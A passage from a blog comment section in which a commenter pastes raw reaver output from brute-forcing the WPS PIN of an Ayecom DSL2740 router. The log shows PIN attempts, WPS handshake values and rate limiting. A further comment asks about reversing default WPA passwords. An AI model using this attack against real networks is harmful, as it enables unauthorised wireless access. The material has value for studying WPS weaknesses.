    [P] PKR: ef:ab:0e:86:1e:fe:46:04:1c:06:ea:64:83:54:f1:96:5f:be:62:71:f7:2b:73:16:25:f5:b7:58:36:06:78:00:2e:8e:10:cd:c6:f1:19:f7:a1:96:a1:5a:ac:9a:34:40:e2:da:d7:fd:b3:d8:1a:28:83:ae:42:e7:1b:8a:02:ac:60:89:38:49:4d:25:94:06:48:43:cc:56:fb:49:9b:94:ae:ea:98:04:23:94:fa:74:9e:27:2d:a4:1e:a5:af:d3:d3:e0:39:ae:10:a8:a6:29:85:8a:ee:96:e1:68:f8:c8:dc:ed:13:30:86:56:fa:bb:2a:eb:da:8f:d3:01:35:5d:26:4c:bd:2c:fc:34:8e:ec:fd:30:95:9b:36:32:cd:e0:0e:20:6e:7f:28:7b:90:73:fc:5d:2f:a3:2a:92:c6:3f:c5:49:b8:6a:43:e6:e7:46:58:db:47:86:ac:15:47:c2:a2:de:53:4d:f7:af:68:3e:bd:c4:91:17:c5:de:0c:de
    [P] AuthKey: c8:97:0c:90:c7:0f:44:8e:f2:ab:5b:07:08:28:b5:30:49:cd:66:85:d4:26:d0:bd:78:c9:1d:9b:68:e3:3a:de

    [+] Sending M2 message

    [P] E-Hash1: 35:87:81:a8:a8:29:b3:94:2c:cf:81:76:63:fb:9f:6d:cf:98:b0:3e:b8:a3:56:ab:d0:b1:db:6d:d6:a0:5e:b2

    [P] E-Hash2: 2e:d4:67:3e:87:73:6f:71:8b:ad:f5:68:ad:33:16:9d:0e:bd:6b:3b:3a:6b:95:5d:9c:7a:95:99:6d:19:64:24

    [+] Received M3 message

    [+] Sending M4 message

    [+] Received WSC NACK

    [+] Sending WSC NACK

    [+] p2_index set to 61

    [+] Pin count advanced: 10061. Max pin attempts: 11000

    [+] Trying pin 43210527.

    [+] Sending EAPOL START request

    [+] Received identity request

    [+] Sending identity response

    [+] Received identity request

    [+] Sending identity response

    [P] E-Nonce: 2e:41:da:97:81:3a:3c:da:96:04:71:12:f7:7e:0a:74

    [P] PKE: c6:11:70:52:91:d1:3c:75:cc:bb:d9:c1:c8:0c:cf:03:3f:3b:cd:db:0f:05:38:0a:28:ef:d2:ca:fb:78:06:f6:40:9f:e1:00:fa:cd:20:68:25:a5:92:05:a9:94:c5:02:9d:37:0d:18:06:60:e3:fc:99:58:c9:e7:71:b7:3d:0a:5d:c2:eb:21:b9:f9:7b:7f:72:00:8f:4a:c0:38:00:a8:d7:98:91:e1:39:cb:0e:92:9a:99:94:76:cf:1c:27:ee:ea:0f:df:8c:7e:47:40:8e:71:32:be:4a:94:53:2c:f8:29:22:8d:1d:2c:07:b2:bc:93:00:3b:99:31:14:61:d0:6c:cb:20:c6:1f:cb:72:e8:62:85:10:04:22:eb:4d:05:5c:ec:c9:c2:08:3f:84:32:4c:d3:96:f9:1a:87:90:9f:ff:07:d5:a4:02:a1:96:20:6d:ef:a6:e3:99:8a:d5:eb:52:b5:22:75:11:c7:fa:c4:71:a1:69:75:7f:4a:d8:53

    [P] WPS Manufacturer: Ayecom

    [P] WPS Model Name: AyecomWAP

    [P] WPS Model Number: DSL2740

    [P] Access Point Serial Number: 12345

    [+] Received M1 message

    [P] R-Nonce: 93:22:e2:2e:1f:7a:fc:61:d1:58:89:bf:bc:d9:ce:2f

    [P] PKR: 2f:8e:58:3e:8e:d3:eb:b0:4a:bf:6f:ac:2b:f3:92:93:8f:4f:f8:92:ce:f9:52:3b:d2:7a:b4:68:d5:98:af:ea:18:8a:c5:50:f9:15:b3:50:51:37:45:6d:9a:a7:d7:4b:d6:34:cc:65:67:0b:62:c7:18:15:c8:6a:d2:47:13:af:a2:c1:e3:26:12:be:4b:d2:bd:8e:79:20:1f:f5:fb:a6:18:ac:80:93:0e:fb:63:d4:f2:d7:3a:ec:12:ef:49:db:60:2c:0c:b7:37:0f:ba:92:83:b2:86:b9:02:8b:79:72:b4:a4:dc:e9:66:b2:6d:84:4c:5a:d4:f1:64:26:9c:a1:f0:2a:ce:3e:f4:35:96:84:e8:9d:0e:a7:1d:d3:2a:c1:9e:5c:85:ac:18:fd:48:8f:4d:28:02:23:39:ab:d8:ba:4c:32:74:22:2a:b3:37:81:9d:e1:25:40:c1:12:3f:33:6a:6c:fa:16:43:a4:c3:c0:aa:69:dc:a2:a0:af:16:88

    [P] AuthKey: 89:7a:d1:3b:81:c7:4e:c1:e8:2a:11:88:f3:ea:db:1c:76:a6:d3:10:db:0e:95:af:29:17:1b:b2:eb:00:cd:dd
    [+] Sending M2 message

    [P] E-Hash1: be:cc:43:7b:fd:ab:b0:2b:c0:07:b4:5a:55:3d:30:26:73:9a:ee:4f:c1:bd:2f:a0:b9:b7:2d:ad:91:05:cd:ad

    [P] E-Hash2: be:cb:94:6a:30:3b:04:a5:3f:78:ba:86:f9:7d:f2:fd:01:cc:85:22:f9:33:0b:d5:c0:4b:ff:74:0d:4c:be:fe
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p2_index set to 62
    [+] Pin count advanced: 10062. Max pin attempts: 11000
    [+] 91.47% complete. Elapsed time: 0d0h0m22s.
    [+] Trying pin 43210534.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response

    [P] E-Nonce: 06:b2:bc:75:c2:6c:4f:28:ab:d6:e3:8c:07:bd:c5:3e

    [P] PKE: 27:fd:7e:5d:eb:9f:a6:3a:09:74:b2:3e:d8:fb:b1:fa:78:f6:74:a5:31:73:9d:e6:1d:30:dc:f8:50:2a:9f:dc:fa:86:d6:ce:d7:77:ce:23:05:a0:53:db:f6:9d:8e:66:0c:dd:dc:3e:db:eb:3a:f6:e0:33:8c:a6:d0:48:cc:57:48:f9:16:f8:49:60:dd:c1:97:97:02:0c:e0:a2:55:28:93:51:97:b0:8f:b4:c5:51:cd:db:d0:6a:a2:53:78:22:8d:59:2f:ee:01:4e:ea:7f:fe:85:d2:0c:2d:ce:0d:f1:6f:7e:18:57:f2:1f:dd:18:0f:2e:0e:21:a1:28:64:78:ad:a0:2a:8f:86:6f:eb:47:47:30:c1:03:2c:06:a0:62:6f:01:4d:f6:7a:3f:21:6e:b1:f0:4c:55:16:e1:3a:fe:b8:10:a0:8e:4c:e9:da:ce:ee:5c:68:ea:71:d2:12:6b:88:64:90:a7:98:a2:bc:2c:7b:6f:10:9e:7b:39:55:0d

    [P] WPS Manufacturer: Ayecom

    [P] WPS Model Name: AyecomWAP

    [P] WPS Model Number: DSL2740

    [P] Access Point Serial Number: 12345

    [+] Received M1 message

    [P] R-Nonce: 48:f7:1b:02:85:4e:37:65:3f:4f:fc:4d:53:92:1c:85

    [P] PKR: f3:53:b0:54:c2:58:41:77:d8:8a:ee:eb:a2:63:82:fc:c1:84:67:aa:25:e7:5f:b2:14:e0:e7:38:da:a1:8e:8b:33:4e:93:25:96:c7:f2:2a:df:6e:d0:77:0f:95:bc:ac:9f:44:88:8d:91:bc:12:5a:b9:ee:62:db:15:3b:74:02:2b:3b:d4:10:31:dd:59:50:cc:43:2e:56:8d:62:e7:3e:bc:3d:04:44:36:c9:cb:3a:68:24:04:35:e2:69:95:bb:64:34:2c:dd:b9:7d:84:ef:64:5e:42:46:a3:81:75:dd:36:a1:c5:ba:17:92:21:0e:91:b5:52:dd:38:5e:ef:56:26:dc:41:b0:35:56:a9:83:0c:78:4a:c9:86:d0:a7:44:ff:ee:a7:5d:bc:ca:4e:ec:59:c7:0e:b5:81:7d:85:55:3d:72:9a:f0:7b:c6:24:e1:b6:7c:ca:d5:e8:69:32:ba:b6:24:4b:a8:7a:51:f0:e4:58:fa:d6:bd:bc:cd:5b:13

    [P] AuthKey: 39:f5:77:9e:9b:76:18:f7:10:22:9a:3c:f4:f5:44:f8:97:91:19:38:86:01:7d:49:ae:84:b5:4a:ae:6c:cf:33

    [+] Sending M2 message

    [P] E-Hash1: df:34:eb:44:82:ff:b1:10:22:74:f8:e4:75:af:e9:ad:70:70:6d:81:88:c7:87:8a:df:85:4c:7a:0e:c5:ff:1c

    [P] E-Hash2: 19:77:a3:d9:51:3d:c8:d5:53:b0:f9:00:2a:45:44:86:07:1f:0d:4f:c9:13:f0:92:7e:8d:87:68:16:a3:ab:37

    [+] Received M3 message

    [+] Sending M4 message

    [+] Received WSC NACK

    [+] Sending WSC NACK

    [+] p2_index set to 63

    [+] Pin count advanced: 10063. Max pin attempts: 11000

    [+] Trying pin 43210541.

    [+] Sending EAPOL START request

    [+] Received identity request

    [+] Sending identity response

    [+] Received identity request

    [+] Sending identity response

    [P] E-Nonce: 3b:75:ce:79:91:1a:7e:3a:53:70:22:fa:23:ca:ab:2b

    [P] PKE: 6c:da:72:f9:c8:c4:d8:b6:e6:05:1c:d1:79:9f:53:7c:a6:8b:80:df:bb:cb:09:d1:83:11:a0:ff:b8:0c:b6:5a:9d:f6:65:f8:fd:16:0b:d6:52:e7:9d:b6:dd:24:fb:a7:c6:b4:0a:cd:10:57:50:a8:06:9f:3e:63:a0:61:4e:91:a0:8d:d1:f6:63:f0:33:cb:4f:b6:dc:3d:24:e4:86:ba:5c:06:6b:6e:38:95:d9:58:37:60:8e:57:3a:70:9d:7f:9b:f3:26:9c:9b:a8:e7:af:29:ba:6a:16:f9:b1:fd:4d:26:92:49:dd:fe:47:4e:db:13:5e:47:71:e1:1c:38:2a:b6:de:f6:02:ed:69:bc:97:55:c3:a8:b2:a5:56:f6:11:5b:27:d4:10:b2:6a:ca:2b:b9:7c:a7:a5:ad:f9:8e:18:9d:40:ff:d0:a0:79:b7:ad:66:51:1e:24:dd:0c:b8:0a:a1:41:8e:db:cf:6f:dd:2c:cc:44:26:9f:60:fa:87:2e

    [P] WPS Manufacturer: Ayecom

    [P] WPS Model Name: AyecomWAP

    [P] WPS Model Number: DSL2740

    [P] Access Point Serial Number: 12345

    [+] Received M1 message

    [P] R-Nonce: f1:49:76:9e:72:22:88:29:c5:81:70:c8:e8:73:43:6a

    [P] PKR: 28:66:f4:63:4b:f0:69:9a:3e:b5:b5:98:9d:45:41:51:45:30:6b:18:0a:28:b1:81:b5:fa:15:96:18:20:fc:8f:76:06:bb:7f:56:3e:4f:f2:93:fc:85:57:3d:db:58:82:7d:2f:64:01:b8:d3:f3:3c:5c:1a:06:3c:d5:fc:a7:ab:14:05:83:10:4e:0c:62:04:20:58:bb:24:12:df:e4:6f:91:f3:91:5d:a4:79:71:f3:7f:cf:90:0d:a7:94:aa:95:f5:fa:04:40:9a:39:83:8d:ba:49:c0:92:4a:c2:bd:df:d4:57:34:8b:20:ac:3f:fd:32:29:b8:15:05:8d:7f:af:d2:e7:4b:55:f4:c8:9e:c4:e3:fe:9d:ca:12:58:76:43:da:cb:c6:70:c1:6a:d9:a2:c5:fe:40:04:0b:1f:38:58:0b:e3:09:ae:3d:fb:79:1e:98:9b:eb:bc:a9:3b:c6:d9:fd:6c:ff:d8:3d:a8:38:e9:b2:b1:31:71:6a:5a:66:a1

    [P] AuthKey: e5:9c:4e:dd:28:b8:7b:f3:89:8e:da:10:a2:8f:9d:2f:76:74:80:85:09:7b:4e:52:66:84:3e:e2:31:a3:76:bd

    [+] Sending M2 message

    [P] E-Hash1: c3:b0:c6:9e:e0:88:e0:67:cc:59:d3:07:a5:24:72:c7:02:e0:78:6f:0b:87:80:df:24:ad:41:e4:ed:f3:1e:d2

    [P] E-Hash2: 11:71:79:af:79:21:52:ef:02:7a:ca:6d:29:78:a6:e8:27:c2:f7:33:67:cb:fb:e6:57:25:43:43:fd:20:c8:20

    [+] Received M3 message

    [+] Sending M4 message

    [+] Received WSC NACK

    [+] Sending WSC NACK

    [+] p2_index set to 64

    [+] Pin count advanced: 10064. Max pin attempts: 11000

    [+] Trying pin 43210558.

    [+] Sending EAPOL START request

    [+] Received identity request

    [+] Sending identity response

    [+] Received identity request

    [+] Sending identity response

    [P] E-Nonce: 09:b1:04:63:2d:de:a1:15:ff:59:09:89:ac:2a:ef:ef

    [P] PKE: 23:a2:70:73:f8:70:30:ce:f3:36:e5:c1:ab:fe:17:7f:a2:35:2b:5a:48:ae:30:de:ab:9a:8c:10:80:f4:5b:b3:1f:39:05:88:e1:57:79:44:ed:48:84:41:fc:4e:30:5c:89:13:bb:a6:e9:d7:11:41:b7:9a:66:ed:5b:e0:7e:ed:bc:b6:13:e1:ec:83:e4:e7:2f:18:b8:28:59:00:90:5b:8a:46:27:eb:ff:9a:be:16:2f:d8:34:9e:83:3e:16:7b:35:33:87:61:89:14:16:c3:86:b9:5c:ca:64:8b:f3:85:8c:77:5d:fe:0c:37:f0:b2:93:dc:e9:10:e7:48:d9:c0:b2:ee:bf:13:14:d6:57:53:e4:a8:5a:6c:34:08:de:30:35:b8:ce:b9:98:cf:c3:4f:37:e3:97:a9:14:b4:d1:93:d5:37:6e:d5:9f:5e:05:ee:21:6e:8e:6c:04:3e:a8:a4:c7:d1:73:69:5a:e2:16:88:57:e2:5d:c0:36:7e:c3:5b

    [P] WPS Manufacturer: Ayecom

    [P] WPS Model Name: AyecomWAP

    [P] WPS Model Number: DSL2740

    [P] Access Point Serial Number: 12345

    [+] Received M1 message

    [P] R-Nonce: fd:d0:db:6e:65:a2:a9:a9:18:07:2d:42:49:60:76:b9

    [P] PKR: b7:b8:77:0b:8b:47:7d:8b:ef:73:31:b3:12:30:4d:07:8a:a3:92:c8:16:47:32:f5:57:ce:d8:6a:1d:65:47:b4:fb:06:24:fd:fe:f9:75:c5:e5:45:82:b2:eb:f6:85:9f:58:0a:aa:14:24:f5:3d:db:96:bb:ab:a9:64:ca:85:0d:8b:4b:cc:07:ba:b3:0d:24:ed:c6:57:e8:e8:16:0b:74:05:da:90:6b:17:00:71:6b:c2:e8:86:d5:a3:1e:ce:70:b5:ff:13:43:90:82:f3:39:c1:53:9b:f2:9d:a5:0a:43:1f:98:d2:c5:30:c5:8c:6d:26:7c:34:69:1b:ef:51:0d:01:31:48:5a:96:b4:ed:1d:b7:ad:8e:5d:fd:70:bd:b1:d5:b7:1f:12:71:26:21:28:7d:05:bf:32:d2:a5:ee:28:b3:17:49:9f:45:33:b1:a1:06:7d:a2:65:67:65:9d:94:e1:0b:54:af:80:fc:54:a8:5f:ec:9f:13:0d:40:89:34

    [P] AuthKey: 4f:8d:a0:d4:eb:89:35:6f:27:16:ae:ec:fa:2f:4c:f9:d4:98:28:1d:9b:59:a9:7e:3a:9f:01:5c:fe:07:04:bc

    [+] Sending M2 message

    [P] E-Hash1: b5:e5:6a:1d:95:eb:66:ec:7e:79:ea:f3:81:3c:09:b8:20:1d:99:cd:ba:4a:13:b8:33:d2:6e:4d:9c:cb:58:e3

    [P] E-Hash2: 14:db:df:ff:3f:0f:f3:43:0e:a8:2a:4e:91:14:37:be:82:27:06:0a:4d:f8:b6:f3:dc:ce:08:9f:82:41:f0:74

    [+] Received M3 message

    [+] Sending M4 message

    [+] Received WSC NACK

    [+] Sending WSC NACK

    [+] p2_index set to 65

    [+] Pin count advanced: 10065. Max pin attempts: 11000

    [+] Trying pin 43210565.

    [+] Sending EAPOL START request

    [+] Received identity request

    [+] Sending identity response

    [+] Received identity request

    [+] Sending identity response

    [P] E-Nonce: 4b:31:04:9e:6f:58:b4:9f:de:ba:26:91:0e:94:48:e9

    [P] PKE: eb:a4:84:36:61:72:9f:11:c6:9a:41:dc:ac:db:d6:1b:a3:77:83:06:60:bb:5c:b8:b7:d7:c2:db:a8:ec:68:bb:8f:2a:83:be:fd:78:1c:7b:6f:1a:ed:1d:a7:f6:3f:ad:6f:33:fd:4d:67:d6:62:ad:3c:cf:c8:97:2d:45:4c:94:87:fb:d1:10:e9:9f:78:c2:ab:3b:36:73:5c:13:d4:15:1c:88:86:89:31:91:58:ae:50:ee:bb:50:1c:8e:14:14:6d:96:b3:7b:2d:04:5f:83:77:1e:13:5e:9f:93:6e:ef:16:52:9b:ee:4d:73:1e:cf:05:3d:18:92:08:4e:ae:a8:dd:15:14:a2:03:c7:ad:82:c6:3f:fb:83:ed:20:0b:61:09:9a:34:0a:2c:2b:85:3f:e0:0a:ee:9b:ea:f8:97:87:a2:a6:b8:61:ca:fd:ad:d7:e8:3f:e5:5a:cc:20:48:4e:ea:fd:9c:75:21:15:42:e6:c3:3c:35:da:c4:5e:91:8d

    [P] WPS Manufacturer: Ayecom

    [P] WPS Model Name: AyecomWAP

    [P] WPS Model Number: DSL2740

    [P] Access Point Serial Number: 12345

    [+] Received M1 message

    [P] R-Nonce: 1a:dc:72:81:fc:44:12:1e:9f:ee:8e:5d:b4:f1:70:98

    [P] PKR: ca:2f:d9:11:b8:0e:f0:7f:6d:02:ee:d7:75:cf:d2:49:23:90:14:8d:2f:1b:49:02:fc:9c:e6:fa:c7:63:96:71:38:de:b6:9f:c4:4e:df:75:9b:93:30:89:e1:27:0a:3a:7e:5d:92:f2:2b:9b:4a:27:f9:61:be:c8:d0:0a:26:a4:95:df:ee:8a:d2:eb:eb:5d:fd:94:3b:da:e0:69:a6:01:1c:cd:f8:17:97:61:fa:44:92:4b:1c:dd:87:44:97:f9:0c:fa:88:b0:6a:84:14:0d:18:90:64:43:e7:7e:e2:fa:58:a5:57:74:0b:d6:e2:7d:06:d3:3d:9a:5a:86:84:86:f1:d1:75:7b:f9:ca:6f:1c:3a:93:ee:06:58:cd:b6:c8:76:76:47:7f:ec:95:5f:2f:d5:d4:07:bb:ff:bf:fc:e0:46:83:11:d2:84:15:aa:6e:c0:04:f0:34:dc:60:4d:e8:81:5f:79:cc:f5:89:6a:0a:36:ba:f3:98:6e:e9:46:4b

    [P] AuthKey: 49:29:be:4d:a0:ce:1e:e1:da:87:a6:ff:2f:93:45:01:f8:70:f3:2e:64:6a:61:a5:7d:7c:41:25:84:fd:37:31

    [+] Sending M2 message

    [P] E-Hash1: 78:e8:ba:69:95:a6:0a:20:f2:82:e6:a2:39:01:cf:00:ba:2c:64:99:5f:1e:7b:f9:23:02:d5:86:8e:56:b4:e3

    [P] E-Hash2: 46:b5:b4:6d:2c:6f:13:ff:fb:96:b5:2f:f7:12:15:cb:a0:b7:ab:40:f6:c8:93:bc:75:7c:70:a1:69:33:1d:85

    [+] Received M3 message

    [+] Sending M4 message

    [+] Received WSC NACK

    [+] Sending WSC NACK

    [+] p2_index set to 66

    [+] Pin count advanced: 10066. Max pin attempts: 11000

    [+] Trying pin 43210572.

    [+] Sending EAPOL START request

    [+] Received identity request

    [+] Sending identity response

    [+] Received identity request

    [+] Sending identity response

    [P] E-Nonce: dc:84:3c:8d:64:5e:3f:59:89:57:31:8a:ec:b9:44:bb
    [P] PKE: 21:4f:69:33:fa:be:ef:54:03:cc:a5:77:6f:90:55:8f:a8:c3:32:69:a7:0e:2b:ba:38:92:16:43:e3:75:9e:ac:6e:8f:22:61:fa:33:b0:01:27:2b:54:9a:34:d3:62:7d:ef:24:53:f4:01:ea:c0:b2:43:fa:f4:01:1d:8a:57:6a:2a:cc:08:a6:4b:8e:d1:47:2d:9a:99:a4:e6:e2:3c:71:08:80:0c:be:3b:35:e9:be:4d:7c:d4:18:e2:50:dd:61:46:e2:b6:c3:8d:ba:a4:34:b5:5b:d8:3c:cf:36:49:15:73:b8:41:67:fd:7f:23:ef:dd:b8:bf:bf:82:76:90:a4:70:3c:70:6a:07:33:09:2a:b5:17:e0:8e:5b:2a:5c:73:2a:18:c5:73:54:9e:ab:72:29:69:3c:f9:75:59:b2:df:8c:15:79:cb:8e:98:a7:23:f0:9a:28:8b:1b:64:fa:30:9e:2d:27:1e:5e:05:9f:cf:dc:4d:b9:44:43:44:a7:85

    [P] WPS Manufacturer: Ayecom

    [P] WPS Model Name: AyecomWAP

    [P] WPS Model Number: DSL2740

    [P] Access Point Serial Number: 12345

    [+] Received M1 message

    [P] R-Nonce: cb:ec:a5:d2:d6:74:d9:53:62:90:77:c9:fe:20:82:16

    [P] PKR: 97:b6:a6:ce:b2:00:7c:f0:c0:46:04:57:e5:7c:4d:5c:c3:12:77:17:3e:23:7a:5f:3d:73:a8:3a:f5:b5:7a:d0:b8:70:7e:cf:49:7e:9d:1b:3f:59:81:94:ae:fa:54:97:fe:d7:dc:67:08:b2:bf:fe:bd:4e:50:e3:ba:01:e1:4f:15:ee:e2:04:89:0d:dd:42:40:9a:a5:ef:45:aa:bd:19:21:47:c8:f7:79:fe:07:48:bd:20:b8:a0:82:ca:16:8c:5f:02:7f:fa:7f:ac:28:ba:9c:0c:67:d7:96:7f:62:80:1f:0a:c6:57:7c:ce:04:d3:ac:ed:cd:f7:e1:63:f3:59:5e:ee:38:b2:2b:31:fc:d1:6e:af:9e:71:2f:5a:d9:60:36:65:d4:af:9a:8d:b0:12:5a:f0:fd:a9:90:2c:e4:14:e6:de:bd:a5:19:d1:dd:0d:6b:08:97:c6:28:a4:6c:60:dd:5a:78:d9:40:64:3f:29:2b:d1:fa:4a:a4:6c:09:cb

    [P] AuthKey: fe:d6:e7:24:e3:41:4b:f2:49:87:1e:66:49:9f:95:40:b4:85:72:83:e6:4b:ca:53:51:98:de:73:92:43:1b:00

    [+] Sending M2 message

    [P] E-Hash1: 10:b2:b6:34:44:c2:34:25:54:4b:4e:f0:b9:6f:66:47:a6:22:94:c3:bf:39:03:9b:b5:f2:be:5b:9d:65:21:a8

    [P] E-Hash2: 45:9d:9e:f1:5f:07:96:b1:11:99:8c:56:3f:1e:b0:dd:37:e4:a4:aa:f8:28:6e:7e:9d:24:cc:52:ee:90:ba:c9

    [+] Received M3 message

    [+] Sending M4 message

    [+] Received WSC NACK

    [+] Sending WSC NACK

    [+] p2_index set to 67

    [+] Pin count advanced: 10067. Max pin attempts: 11000

    [+] 91.52% complete. Elapsed time: 0d0h0m43s.

    [+] Estimated Remaining time: 0d1h2m12s

    [+] Trying pin 43210589.

    [+] Sending EAPOL START request

    [+] Received identity request

    [+] Sending identity response

    [+] Received identity request

    [+] Sending identity response

    [+] Received identity request

    [+] Sending identity response

    [+] Received identity request

    [+] Sending identity response

    [+] Received identity request

    [+] Sending identity response

    [+] Received identity request

    [+] Sending identity response

    [+] Received identity request

    [+] Sending identity response

    [!] EAP_FAILURE: TERMINATE

    [+] Sending WSC NACK

    [!] WPS transaction failed (code: 0x03), re-trying last pin

    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

    ^C
    [+] Session saved.
    root@bt:~/reaver-wps-fork-t6x/src#

  38. Silve says:

    Have you got some experience on, router generating default WPA password, and reversing it?

  39. Pingback: 18 – WPS Offline Pixie Dust Attack |

Leave a Reply

Your email address will not be published. Required fields are marked *